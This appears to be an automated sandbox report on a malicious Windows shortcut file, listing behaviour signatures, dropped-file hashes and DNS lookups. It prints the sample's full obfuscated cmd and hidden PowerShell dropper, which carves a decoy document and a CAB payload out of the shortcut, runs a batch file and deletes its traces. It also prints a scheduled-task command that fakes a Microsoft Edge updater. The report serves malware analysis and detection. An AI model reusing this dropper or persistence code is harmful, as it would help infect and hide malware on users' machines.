Analysis Overview
SHA256
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
Threat Level: Likely malicious
The file 00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37 was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Deletes itself
Checks computer location settings
Drops file in Windows directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: CmdExeWriteProcessMemorySpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-11 04:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 04:49
Reported
2024-06-11 04:52
Platform
win7-20240508-en
Max time kernel
118s
Max time network
126s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1744 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe |
| PID 1744 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe |
| PID 1744 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe |
| PID 1744 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\cmd.exe |
| PID 2760 wrote to memory of 2860 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2760 wrote to memory of 2860 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2760 wrote to memory of 2860 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2760 wrote to memory of 2860 | N/A | C:\Windows\syswow64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 04:49
Reported
2024-06-11 04:52
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\expand.exe
"C:\Windows\system32\expand.exe" C:\ProgramData\MicrosoftEdge\gewcdqa.cab -f:* C:\ProgramData\MicrosoftEdge
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\MicrosoftEdge\parkonA.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 13 /tn "MicrosoftEdgeEasyUpdate" /tr "cmd /q /c \"start \"Microsoft Edge Updater\" /min \"C:\ProgramData\MicrosoftEdge\parkon.bat\" &exit\"" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.110.63.41.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/3352-0-0x0000000074BFE000-0x0000000074BFF000-memory.dmp
memory/3352-1-0x0000000004980000-0x00000000049B6000-memory.dmp
memory/3352-2-0x0000000005080000-0x00000000056A8000-memory.dmp
memory/3352-3-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/3352-4-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/3352-5-0x0000000004FB0000-0x0000000004FD2000-memory.dmp
memory/3352-6-0x00000000058A0000-0x0000000005906000-memory.dmp
memory/3352-7-0x0000000005910000-0x0000000005976000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3ziythu.2hi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3352-17-0x0000000005B50000-0x0000000005EA4000-memory.dmp
memory/3352-18-0x0000000005F30000-0x0000000005F4E000-memory.dmp
memory/3352-19-0x0000000005F80000-0x0000000005FCC000-memory.dmp
memory/3352-20-0x0000000006F30000-0x0000000006FC6000-memory.dmp
memory/3352-21-0x0000000006480000-0x000000000649A000-memory.dmp
memory/3352-22-0x00000000064D0000-0x00000000064F2000-memory.dmp
memory/3352-23-0x00000000077D0000-0x0000000007D74000-memory.dmp
memory/3352-24-0x0000000008400000-0x0000000008A7A000-memory.dmp
\??\c:\programdata\microsoftedge\gewcdqa.cab
| MD5 | bce6d6994700a3e05b4a22e3381a4d36 |
| SHA1 | 6d3b8fd8c18f1daad940d3589890054fe5ff21b1 |
| SHA256 | 623bda38e2790240ae31383db173ded9d295aa484f653ed4f1329174bbaf6154 |
| SHA512 | 3dff495bfdb146ab244faefd7ea5944836bddf03732a2402f82b7d09cc45292a43f3188527c9099e216b50279507bfdadd0689c2bf44237a1cbea9123016558e |
C:\ProgramData\MicrosoftEdge\parkonA.bat
| MD5 | a938e5c37311dabc48dc1d14c520b02a |
| SHA1 | db9111dbb2eef7fb3482fa014bcea90c9b3df1f5 |
| SHA256 | fc13917afce9cae08c5aadfa35cf7b210208527e4d0a7f02d24eac82dc96460f |
| SHA512 | a9e8e5f93dac1e72985719e6bbd612e90459d71f4a7b0848198346d031c3777ad02f4d13a38ccb05a03a317290dc3538cb3da032e53482d1718ce083d648b09e |
C:\ProgramData\MicrosoftEdge\parkon.pko
| MD5 | f772107c865925631a56fac02f0c9631 |
| SHA1 | cdc8ee71f01c59c3362548f751ec2803b745c6bd |
| SHA256 | e173955f4c0d266c3a108a95eeca07c88df1810b763b1b254596e40e75177894 |
| SHA512 | 4efc5babb74ed98f78b6a342290c1f7645fc49c247d4eece1c2cbe6fdb25df70ce9ca78ac0929121898e180385f575f92304c3a09a8db1fcb4af43e5a4238235 |
C:\ProgramData\MicrosoftEdge\parkonB.pko
| MD5 | 0d550d3c3fcc95dc191a9cb56f8d7fea |
| SHA1 | e557278ee060b09fa227a0b9ef144e021763ecd5 |
| SHA256 | 16ccd83a5c3d0e686491e7f7f650a7199d6add01c25fe587bf81b1e43575f564 |
| SHA512 | 219d9f06cab7289935d1fc3476d41218b7910cce9fa9c60eda129d430b7f6d30e58a9619cfd6f93da9b1fde3c7f7d07383ecd174fcf2c98618ac75bbb804ca60 |
memory/3352-51-0x0000000074BF0000-0x00000000753A0000-memory.dmp